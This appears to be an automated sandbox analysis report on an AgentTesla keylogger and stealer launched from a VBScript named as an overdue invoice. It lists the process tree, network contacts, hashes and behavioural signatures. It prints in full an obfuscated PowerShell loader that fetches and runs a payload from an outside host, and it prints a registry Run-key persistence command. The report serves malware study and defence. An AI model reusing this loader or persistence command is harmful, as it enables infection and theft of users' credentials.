memory/4456-49-0x00007FFC72C70000-0x00007FFC73731000-memory.dmp

memory/5016-50-0x0000000024850000-0x00000000248A0000-memory.dmp

memory/5016-51-0x0000000024940000-0x00000000249D2000-memory.dmp

memory/5016-52-0x0000000024930000-0x000000002493A000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 09:18

Reported

2024-06-03 09:20

Platform

win7-20240221-en

Max time kernel

141s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)" C:\Windows\SysWOW64\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1964 set thread context of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2952 wrote to memory of 2156 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2952 wrote to memory of 2156 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2952 wrote to memory of 2156 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 2636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1964 wrote to memory of 2424 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 2424 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 2424 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 2424 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1964 wrote to memory of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1964 wrote to memory of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1964 wrote to memory of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1964 wrote to memory of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1964 wrote to memory of 2112 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2112 wrote to memory of 1800 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 1800 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 1800 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 1800 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1800 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1800 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1800 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1800 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.innovativebuildingsolutions.in udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp

Files

memory/2156-4-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

memory/2156-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

memory/2156-6-0x00000000027A0000-0x00000000027A8000-memory.dmp

memory/2156-8-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2156-7-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2156-9-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2156-10-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6J4520554E2X6SS5OMAQ.temp

MD5 a827ff99cbccfab8cc86b1c1fecc9021
SHA1 911690184d451687ed5fa08601a9b93387ac97b5
SHA256 262b2a2744c9e11590a9659239470480c3f690ade183679cb9914a9e4cc88594
SHA512 9e89423da63c455fe9d5ed715f8dd917826a849f372b09546473593efe117b7719aeb5fab180d0ed0ec1ee4495ef2717e460b21c7a453d0273c2bcd4b6e0179f

C:\Users\Admin\AppData\Roaming\Skrmet.Kli

MD5 9916e5a5f7afe8c1f861f93999a875f3
SHA1 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc
SHA256 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df
SHA512 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc

memory/2156-16-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/1964-17-0x0000000006680000-0x000000000A2DC000-memory.dmp

memory/2156-18-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

memory/2112-32-0x0000000000AC0000-0x0000000001B22000-memory.dmp

memory/2156-33-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

memory/2112-34-0x0000000000AC0000-0x0000000000B00000-memory.dmp